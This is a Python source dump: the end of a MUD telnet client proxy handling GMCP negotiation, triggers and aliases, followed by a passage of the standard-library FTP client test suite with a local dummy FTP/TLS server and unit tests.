                supportables = ['char 1', 'char.base 1', 'char.maxstats 1', 'char.status 1', 'char.statusvars 1', 'char.vitals 1', 'char.worth 1', 'comm 1', 'comm.tick 1', 'group 1', 'room 1', 'room.info 1']
                # GMCP wants double-quoted JSON-ish lists.
                self.gmcpOut('Core.Supports.Set ' + str(supportables).replace("'", '"'))
                self.gmcpOut('request room')
                self.gmcpOut('request char')
            elif option == telnetlib.TTYPE:
                self.log("Sending terminal type 'Cizra'")
                sock.sendall(telnetlib.IAC + telnetlib.DO + option +
                             telnetlib.IAC + telnetlib.SB + telnetlib.TTYPE + telnetlib.BINARY + b'Cizra' + telnetlib.IAC + telnetlib.SE)
            else:
                # Refuse any other option the server offers.
                sock.sendall(telnetlib.IAC + telnetlib.DONT + option)
        elif cmd == telnetlib.SE:
            # End of a subnegotiation: pull its buffered payload.
            data = self.telnet.read_sb_data()
            if data and data[0] == ord(telnetlib.GMCP):
                try:
                    self.handleGmcp(data[1:].decode(self.mud_encoding))
                except Exception as e:
                    traceback.print_exc()

    def handleGmcp(self, data):
        # this.that {JSON blob}
        # TODO: move into clients
        space_idx = data.find(' ')
        whole_key = data[:space_idx]
        value_json = data[space_idx + 1:]
        # Walk/create the nested dict path for a dotted key like Char.Vitals.
        nesting = whole_key.split('.')
        current = self.world.gmcp
        for nest in nesting[:-1]:
            if nest not in current:
                current[nest] = {}
            current = current[nest]
        lastkey = nesting[-1]
        try:
            val = json.loads(value_json, strict=False)
        except json.decoder.JSONDecodeError:
            # Not valid JSON: keep the raw text.
            val = {"string": value_json}
        if lastkey not in current:
            current[lastkey] = {}
        current[lastkey] = val
        self.world.handleGmcp(whole_key, val)

    def connect(self, host, port):
        """Open the telnet connection with our negotiation callback installed."""
        t = telnetlib.Telnet()
        t.set_option_negotiation_callback(self.iac)
        # t.set_debuglevel(1)
        t.open(host, int(port))
        return t

    def send(self, line):
        """Send one command line to the MUD (echoed locally)."""
        print("> ", line)
        self.telnet.write((line + '\n').encode(self.mud_encoding))

    def handle_from_telnet(self):
        """Read MUD output, run triggers on each line, forward to client."""
        try:
            data = self.telnet.read_very_eager()
        except:
            self.log("EOF on telnet")
            self.stopFlag.set()
            self.world.quit()
            raise
        try:
            data = data.decode(self.mud_encoding)
        except UnicodeError as e:
            print("Unicode error:", e)
            print("Data was:", data)
            data = ''
        if not data:
            # Drain any pending subnegotiation data even with no text.
            _ = self.telnet.read_sb_data()
        prn = []
        for line in data.split('\n'):
            if line:
                replacement = None
                try:
                    # A trigger may rewrite the line by returning non-None.
                    replacement = self.world.trigger(line.strip())
                except Exception as e:
                    traceback.print_exc()
                if replacement is not None:
                    line = replacement
            prn.append(line)
        # NOTE(review): output to the client pipe is encoded with
        # mud_encoding here, while every other client-bound write uses
        # client_encoding — confirm which is intended.
        self.pipeToSocketW.write('\n'.join(prn).encode(self.mud_encoding))
        self.pipeToSocketW.flush()

    def show(self, line):
        """Write a line directly to the client."""
        self.pipeToSocketW.write(line.encode(self.client_encoding))
        self.pipeToSocketW.flush()

    def handle_from_pipe(self):
        """Read client input from the proxy pipe and process whole lines."""
        data = b''  # to handle partial lines
        # NOTE(review): `data` is a local, so a buffered partial line is
        # discarded between calls; and `lines[-1] != ''` compares bytes
        # with str, which is always True in Python 3 — the else branch is
        # unreachable. Confirm intended partial-line semantics.
        try:
            data += os.read(self.socketToPipeR, 4096)
            lines = data.split(b'\n')
            if lines[-1] != '':  # received partial line, don't process
                data = lines[-1]
            else:
                data = b''
            lines = lines[:-1]  # chop off either the last empty line, or the partial line
            for line in lines:
                line = line.decode(self.client_encoding)
                # NOTE(review): raises IndexError for an empty line.
                if line[-1] == '\r':
                    line = line[:-1]
                self.handle_output_line(line)
        except EOFError:
            # NOTE(review): os.read does not raise EOFError (it returns
            # b'' at EOF), so this handler likely never fires.
            self.log("EOF in pipe")
            self.stopFlag.set()
            self.world.quit()
            raise

    def handle_output_line(self, data):
        """Process one client command: #reload, world alias, or raw send."""
        pprint.pprint(data)
        if data == '#reload' and self.world:
            self.log('Reloading world')
            try:
                # Preserve state/gmcp across a hot reload of the module.
                state = self.world.state
                gmcp = self.world.gmcp
                self.world.quit()
                self.world_module = importlib.reload(self.world_module)
                self.world = self.world_module.getClass()(self, self.arg)
                self.world.state = state
                self.world.gmcp = gmcp
            except Exception:
                traceback.print_exc()
                return
        else:
            handled = False
            try:
                handled = self.world.alias(data)
            except Exception as e:
                traceback.print_exc()
            else:
                # Only forward if no alias consumed the command.
                if not handled:
                    self.send(data)

    def run(self):
        """Main loop: multiplex telnet and client pipe until either dies."""
        try:
            while True:
                fds, _, _ = select([self.telnet.get_socket(), self.socketToPipeR], [], [])
                for fd in fds:
                    if fd == self.telnet.get_socket():
                        self.handle_from_telnet()
                    elif fd == self.socketToPipeR:
                        self.handle_from_pipe()
        except Exception as e:
            self.log("Exception in run():", e)
        finally:
            self.log("Closing")
            self.telnet.close()
def main():
    """Entry point: load the world module named on the command line and run
    a Session bridging it to the given local port."""
    argc = len(sys.argv)
    if not 3 <= argc <= 4:
        print("Usage: {} worldmodule (without .py) port [arg]".format(sys.argv[0]))
        exit(1)
    module = importlib.import_module(sys.argv[1])
    local_port = int(sys.argv[2])
    extra = sys.argv[3] if argc == 4 else None
    session = Session(module, local_port, extra)
    session.run()
# Standard script guard: run main() only when executed directly, so the
# module can also be imported without side effects.  The previous
# `assert(__name__ == '__main__')` raised AssertionError on import and,
# under `python -O`, was stripped entirely so main() ran unconditionally.
if __name__ == '__main__':
    main()
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
threading = support.import_module('threading')
# Timeout (seconds) applied to every test socket so a wedged connection
# fails fast instead of hanging the test run.
TIMEOUT = 3
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
# RFC 3659 MLSD fact lines covering the entry shapes the tests exercise:
# dirs, symlinks, devices, names with spaces, "=" in fact values, etc.
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
             "type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
             "type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
             "type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
             "type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
             "type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
             "type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
             "type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
             "type=file;perm=r;unique==keVO1+EG4; two words\r\n"
             "type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
             "type=file;perm=r;unique==keVO1+1G4; file1\r\n"
             "type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
             "type=file;perm=r;unique==keVO1+1G4; file2\r\n"
             "type=file;perm=r;unique==keVO1+1G4; file3\r\n"
             "type=file;perm=r;unique==keVO1+1G4; file4\r\n")
class DummyDTPHandler(asynchat.async_chat):
    """Server-side data channel (DTP) for the dummy FTP server.

    Reports received data and the final 226 reply back through the
    control-channel handler (`baseclass`).
    """

    dtp_conn_closed = False

    def __init__(self, conn, baseclass):
        asynchat.async_chat.__init__(self, conn)
        # Owning DummyFTPHandler; receives transfer results.
        self.baseclass = baseclass
        self.baseclass.last_received_data = ''

    def handle_read(self):
        self.baseclass.last_received_data += self.recv(1024).decode('ascii')

    def handle_close(self):
        # XXX: this method can be called many times in a row for a single
        # connection, including in clear-text (non-TLS) mode.
        # (behaviour witnessed with test_data_connection)
        if not self.dtp_conn_closed:
            self.baseclass.push('226 transfer complete')
            self.close()
            # Instance attribute shadows the class-level default from now on.
            self.dtp_conn_closed = True

    def push(self, what):
        # Tests may force the next payload via baseclass.next_data; an
        # empty payload just closes the channel when the queue drains.
        if self.baseclass.next_data is not None:
            what = self.baseclass.next_data
            self.baseclass.next_data = None
        if not what:
            return self.close_when_done()
        super(DummyDTPHandler, self).push(what.encode('ascii'))

    def handle_error(self):
        # Fail loudly: any async error should abort the test.
        raise Exception
class DummyFTPHandler(asynchat.async_chat):
    """Control-channel handler implementing a minimal, scripted FTP server.

    Each FTP verb maps to a cmd_<verb> method; unknown verbs get a 550.
    """

    dtp_handler = DummyDTPHandler

    def __init__(self, conn):
        asynchat.async_chat.__init__(self, conn)
        # tells the socket to handle urgent data inline (ABOR command)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
        self.set_terminator(b"\r\n")
        self.in_buffer = []
        self.dtp = None                 # active data-channel handler
        self.last_received_cmd = None   # inspected by the tests
        self.last_received_data = ''
        self.next_response = ''         # extra reply injected before next cmd
        self.next_data = None           # forced payload for next data push
        self.rest = None                # offset set by a preceding REST
        self.next_retr_data = RETR_DATA
        self.push('220 welcome')

    def collect_incoming_data(self, data):
        self.in_buffer.append(data)

    def found_terminator(self):
        # A complete command line arrived: dispatch to cmd_<verb>.
        line = b''.join(self.in_buffer).decode('ascii')
        self.in_buffer = []
        if self.next_response:
            self.push(self.next_response)
            self.next_response = ''
        cmd = line.split(' ')[0].lower()
        self.last_received_cmd = cmd
        space = line.find(' ')
        if space != -1:
            arg = line[space + 1:]
        else:
            arg = ""
        if hasattr(self, 'cmd_' + cmd):
            method = getattr(self, 'cmd_' + cmd)
            method(arg)
        else:
            self.push('550 command "%s" not understood.' %cmd)

    def handle_error(self):
        # Fail loudly: any async error should abort the test.
        raise Exception

    def push(self, data):
        asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')

    def cmd_port(self, arg):
        # Active mode: connect back to the h1,h2,h3,h4,p1,p2 address.
        addr = list(map(int, arg.split(',')))
        ip = '%d.%d.%d.%d' %tuple(addr[:4])
        port = (addr[4] * 256) + addr[5]
        s = socket.create_connection((ip, port), timeout=TIMEOUT)
        self.dtp = self.dtp_handler(s, baseclass=self)
        self.push('200 active data connection established')

    def cmd_pasv(self, arg):
        # Passive mode: listen and tell the client where to connect.
        with socket.socket() as sock:
            sock.bind((self.socket.getsockname()[0], 0))
            sock.listen()
            sock.settimeout(TIMEOUT)
            ip, port = sock.getsockname()[:2]
            # NOTE(review): true division yields a float; '%d' truncates it
            # so the reply is correct, but `port // 256` would be clearer.
            ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
            self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
            conn, addr = sock.accept()
            self.dtp = self.dtp_handler(conn, baseclass=self)

    def cmd_eprt(self, arg):
        # Extended active mode (RFC 2428): arg is "|af|ip|port|".
        af, ip, port = arg.split(arg[0])[1:-1]
        port = int(port)
        s = socket.create_connection((ip, port), timeout=TIMEOUT)
        self.dtp = self.dtp_handler(s, baseclass=self)
        self.push('200 active data connection established')

    def cmd_epsv(self, arg):
        # Extended passive mode (RFC 2428) over IPv6.
        with socket.socket(socket.AF_INET6) as sock:
            sock.bind((self.socket.getsockname()[0], 0))
            sock.listen()
            sock.settimeout(TIMEOUT)
            port = sock.getsockname()[1]
            self.push('229 entering extended passive mode (|||%d|)' %port)
            conn, addr = sock.accept()
            self.dtp = self.dtp_handler(conn, baseclass=self)

    def cmd_echo(self, arg):
        # sends back the received string (used by the test suite)
        self.push(arg)

    # Canned single-reply commands exercised by the client tests.

    def cmd_noop(self, arg):
        self.push('200 noop ok')

    def cmd_user(self, arg):
        self.push('331 username ok')

    def cmd_pass(self, arg):
        self.push('230 password ok')

    def cmd_acct(self, arg):
        self.push('230 acct ok')

    def cmd_rnfr(self, arg):
        self.push('350 rnfr ok')

    def cmd_rnto(self, arg):
        self.push('250 rnto ok')

    def cmd_dele(self, arg):
        self.push('250 dele ok')

    def cmd_cwd(self, arg):
        self.push('250 cwd ok')

    def cmd_size(self, arg):
        self.push('250 1000')

    def cmd_mkd(self, arg):
        self.push('257 "%s"' %arg)

    def cmd_rmd(self, arg):
        self.push('250 rmd ok')

    def cmd_pwd(self, arg):
        self.push('257 "pwd ok"')

    def cmd_type(self, arg):
        self.push('200 type ok')

    def cmd_quit(self, arg):
        self.push('221 quit ok')
        self.close()

    def cmd_abor(self, arg):
        self.push('226 abor ok')

    def cmd_stor(self, arg):
        self.push('125 stor ok')

    def cmd_rest(self, arg):
        # Remember the offset for the next RETR.
        self.rest = arg
        self.push('350 rest ok')

    def cmd_retr(self, arg):
        self.push('125 retr ok')
        # Honour a preceding REST by starting at the requested offset.
        if self.rest is not None:
            offset = int(self.rest)
        else:
            offset = 0
        self.dtp.push(self.next_retr_data[offset:])
        self.dtp.close_when_done()
        self.rest = None

    def cmd_list(self, arg):
        self.push('125 list ok')
        self.dtp.push(LIST_DATA)
        self.dtp.close_when_done()

    def cmd_nlst(self, arg):
        self.push('125 nlst ok')
        self.dtp.push(NLST_DATA)
        self.dtp.close_when_done()

    def cmd_opts(self, arg):
        self.push('200 opts ok')

    def cmd_mlsd(self, arg):
        self.push('125 mlsd ok')
        self.dtp.push(MLSD_DATA)
        self.dtp.close_when_done()

    def cmd_setlongretr(self, arg):
        # For testing. Next RETR will return long line.
        self.next_retr_data = 'x' * int(arg)
        self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
    """Dummy FTP server: listens on `address` and drives the asyncore loop
    in a dedicated thread; each accepted connection gets a `handler`.
    """

    handler = DummyFTPHandler

    def __init__(self, address, af=socket.AF_INET):
        threading.Thread.__init__(self)
        asyncore.dispatcher.__init__(self)
        self.create_socket(af, socket.SOCK_STREAM)
        self.bind(address)
        self.listen(5)
        self.active = False
        # Lets other threads pause the asyncore loop between iterations.
        self.active_lock = threading.Lock()
        self.host, self.port = self.socket.getsockname()[:2]
        self.handler_instance = None

    def start(self):
        assert not self.active
        self.__flag = threading.Event()
        threading.Thread.start(self)
        # Block until the loop thread has actually started polling.
        self.__flag.wait()

    def run(self):
        self.active = True
        self.__flag.set()
        # One short asyncore iteration per loop so stop() can interleave.
        while self.active and asyncore.socket_map:
            self.active_lock.acquire()
            asyncore.loop(timeout=0.1, count=1)
            self.active_lock.release()
        asyncore.close_all(ignore_all=True)

    def stop(self):
        assert self.active
        self.active = False
        self.join()

    def handle_accepted(self, conn, addr):
        self.handler_instance = self.handler(conn)

    def handle_connect(self):
        self.close()
    handle_read = handle_connect

    def writable(self):
        # Listening socket: never has data to write.
        return 0

    def handle_error(self):
        # Fail loudly: any async error should abort the test.
        raise Exception
# TLS variants of the dummy server classes; only defined when the ssl
# module is available.
if ssl is not None:

    CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
    CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")

    class SSLConnection(asyncore.dispatcher):
        """An asyncore.dispatcher subclass supporting TLS/SSL."""

        _ssl_accepting = False
        _ssl_closing = False

        def secure_connection(self):
            # Wrap the current socket server-side and swap it into the
            # dispatcher; the handshake is driven by the event loop.
            context = ssl.SSLContext()
            context.load_cert_chain(CERTFILE)
            socket = context.wrap_socket(self.socket,
                                         suppress_ragged_eofs=False,
                                         server_side=True,
                                         do_handshake_on_connect=False)
            self.del_channel()
            self.set_socket(socket)
            self._ssl_accepting = True

        def _do_ssl_handshake(self):
            # Retry the non-blocking handshake until it completes, the
            # peer hangs up, or a real error surfaces.
            try:
                self.socket.do_handshake()
            except ssl.SSLError as err:
                if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
                                   ssl.SSL_ERROR_WANT_WRITE):
                    return
                elif err.args[0] == ssl.SSL_ERROR_EOF:
                    return self.handle_close()
                raise
            except OSError as err:
                if err.args[0] == errno.ECONNABORTED:
                    return self.handle_close()
            else:
                self._ssl_accepting = False

        def _do_ssl_shutdown(self):
            self._ssl_closing = True
            try:
                self.socket = self.socket.unwrap()
            except ssl.SSLError as err:
                if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
                                   ssl.SSL_ERROR_WANT_WRITE):
                    return
            except OSError as err:
                # Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
                # from OpenSSL's SSL_shutdown(), corresponding to a
                # closed socket condition. See also:
                # http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
                pass
            self._ssl_closing = False
            # After CCC the control channel keeps running in clear text,
            # so the underlying dispatcher must stay open.
            if getattr(self, '_ccc', False) is False:
                super(SSLConnection, self).close()
            else:
                pass

        def handle_read_event(self):
            if self._ssl_accepting:
                self._do_ssl_handshake()
            elif self._ssl_closing:
                self._do_ssl_shutdown()
            else:
                super(SSLConnection, self).handle_read_event()

        def handle_write_event(self):
            if self._ssl_accepting:
                self._do_ssl_handshake()
            elif self._ssl_closing:
                self._do_ssl_shutdown()
            else:
                super(SSLConnection, self).handle_write_event()

        def send(self, data):
            # Treat renegotiation/teardown conditions as "wrote nothing".
            try:
                return super(SSLConnection, self).send(data)
            except ssl.SSLError as err:
                if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
                                   ssl.SSL_ERROR_WANT_READ,
                                   ssl.SSL_ERROR_WANT_WRITE):
                    return 0
                raise

        def recv(self, buffer_size):
            try:
                return super(SSLConnection, self).recv(buffer_size)
            except ssl.SSLError as err:
                if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
                                   ssl.SSL_ERROR_WANT_WRITE):
                    return b''
                if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
                    self.handle_close()
                    return b''
                raise

        def handle_error(self):
            # Fail loudly: any async error should abort the test.
            raise Exception

        def close(self):
            # Shut TLS down cleanly before closing a still-live SSL socket.
            if (isinstance(self.socket, ssl.SSLSocket) and
                    self.socket._sslobj is not None):
                self._do_ssl_shutdown()
            else:
                super(SSLConnection, self).close()

    class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
        """A DummyDTPHandler subclass supporting TLS/SSL."""

        def __init__(self, conn, baseclass):
            DummyDTPHandler.__init__(self, conn, baseclass)
            # Only wrap the data channel when PROT P was negotiated.
            if self.baseclass.secure_data_channel:
                self.secure_connection()

    class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
        """A DummyFTPHandler subclass supporting TLS/SSL."""

        dtp_handler = DummyTLS_DTPHandler

        def __init__(self, conn):
            DummyFTPHandler.__init__(self, conn)
            self.secure_data_channel = False
            # Set by CCC: keeps the dispatcher open after TLS shutdown.
            self._ccc = False

        def cmd_auth(self, line):
            """Set up secure control channel."""
            self.push('234 AUTH TLS successful')
            self.secure_connection()

        def cmd_ccc(self, line):
            self.push('220 Reverting back to clear-text')
            self._ccc = True
            self._do_ssl_shutdown()

        def cmd_pbsz(self, line):
            """Negotiate size of buffer for secure data transfer.
            For TLS/SSL the only valid value for the parameter is '0'.
            Any other value is accepted but ignored.
            """
            self.push('200 PBSZ=0 successful.')

        def cmd_prot(self, line):
            """Setup un/secure data channel."""
            arg = line.upper()
            if arg == 'C':
                self.push('200 Protection set to Clear')
                self.secure_data_channel = False
            elif arg == 'P':
                self.push('200 Protection set to Private')
                self.secure_data_channel = True
            else:
                self.push("502 Unrecognized PROT type (use C or P).")

    class DummyTLS_FTPServer(DummyFTPServer):
        handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
asyncore.close_all(ignore_all=True)
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, OSError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
    """Exercise mlsd() fact parsing across a wide range of MLSD replies."""
    list(self.client.mlsd())
    list(self.client.mlsd(path='/'))
    list(self.client.mlsd(path='/', facts=['size', 'type']))

    ls = list(self.client.mlsd())
    for name, facts in ls:
        self.assertIsInstance(name, str)
        self.assertIsInstance(facts, dict)
        self.assertTrue(name)
        self.assertIn('type', facts)
        self.assertIn('perm', facts)
        self.assertIn('unique', facts)

    def set_data(data):
        # make the dummy server return exactly this MLSD payload next
        self.server.handler_instance.next_data = data

    def test_entry(line, type=None, perm=None, unique=None, name=None):
        # helper: send one raw MLSD line, then check the parsed entry;
        # defaults mirror the fact values used in the canned lines below
        type = 'type' if type is None else type
        perm = 'perm' if perm is None else perm
        unique = 'unique' if unique is None else unique
        name = 'name' if name is None else name
        set_data(line)
        _name, facts = next(self.client.mlsd())
        self.assertEqual(_name, name)
        self.assertEqual(facts['type'], type)
        self.assertEqual(facts['perm'], perm)
        self.assertEqual(facts['unique'], unique)

    # plain
    test_entry('type=type;perm=perm;unique=unique; name\r\n')
    # "=" in fact value
    test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
    test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
    test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
    test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
    # spaces in name
    test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
    test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
    test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
    test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
    # ";" in name
    test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
    test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
    test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
    test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
    # case sensitiveness
    set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
    _name, facts = next(self.client.mlsd())
    # fact names must be normalized to lowercase
    for x in facts:
        self.assertTrue(x.islower())
    # no data (directory empty)
    set_data('')
    self.assertRaises(StopIteration, next, self.client.mlsd())
    set_data('')
    for x in self.client.mlsd():
        self.fail("unexpected data %s" % x)
def test_makeport(self):
    """Active mode over IPv4 must issue PORT, never the extended EPRT."""
    with self.client.makeport():
        # IPv4 is in use, just make sure send_eprt has not been used
        self.assertEqual(self.server.handler_instance.last_received_cmd,
                         'port')

def test_makepasv(self):
    """Passive mode over IPv4 must issue PASV and yield a usable endpoint."""
    host, port = self.client.makepasv()
    conn = socket.create_connection((host, port), timeout=TIMEOUT)
    conn.close()
    # IPv4 is in use, just make sure send_epsv has not been used
    self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
    """FTP objects must QUIT and disconnect when used as context managers."""
    self.client.quit()

    def is_client_connected():
        # True only if the control channel still answers a NOOP
        if self.client.sock is None:
            return False
        try:
            self.client.sendcmd('noop')
        except (OSError, EOFError):
            return False
        return True

    # base test
    with ftplib.FTP(timeout=TIMEOUT) as self.client:
        self.client.connect(self.server.host, self.server.port)
        self.client.sendcmd('noop')
        self.assertTrue(is_client_connected())
    self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
    self.assertFalse(is_client_connected())

    # QUIT sent inside the with block
    with ftplib.FTP(timeout=TIMEOUT) as self.client:
        self.client.connect(self.server.host, self.server.port)
        self.client.sendcmd('noop')
        self.client.quit()
    self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
    self.assertFalse(is_client_connected())

    # force a wrong response code to be sent on QUIT: error_perm
    # is expected and the connection is supposed to be closed
    try:
        with ftplib.FTP(timeout=TIMEOUT) as self.client:
            self.client.connect(self.server.host, self.server.port)
            self.client.sendcmd('noop')
            self.server.handler_instance.next_response = '550 error on quit'
    except ftplib.error_perm as err:
        self.assertEqual(str(err), '550 error on quit')
    else:
        self.fail('Exception not raised')
    # needed to give the threaded server some time to set the attribute
    # which otherwise would still be == 'noop'
    time.sleep(0.1)
    self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
    self.assertFalse(is_client_connected())
def test_source_address(self):
    """connect() must bind the control socket to an explicit source address."""
    self.client.quit()
    port = support.find_unused_port()
    try:
        self.client.connect(self.server.host, self.server.port,
                            source_address=(HOST, port))
        self.assertEqual(self.client.sock.getsockname()[1], port)
        self.client.quit()
    except OSError as e:
        # the "unused" port may have been taken in the meantime
        if e.errno == errno.EADDRINUSE:
            self.skipTest("couldn't bind to port %d" % port)
        raise

def test_source_address_passive_connection(self):
    """Passive data connections must honour client.source_address too."""
    port = support.find_unused_port()
    self.client.source_address = (HOST, port)
    try:
        with self.client.transfercmd('list') as sock:
            self.assertEqual(sock.getsockname()[1], port)
    except OSError as e:
        # the "unused" port may have been taken in the meantime
        if e.errno == errno.EADDRINUSE:
            self.skipTest("couldn't bind to port %d" % port)
        raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
    """Commands longer than maxline must be rejected client side."""
    self.assertRaises(ftplib.Error, self.client.sendcmd,
                      'x' * self.client.maxline * 2)

def test_retrlines_too_long(self):
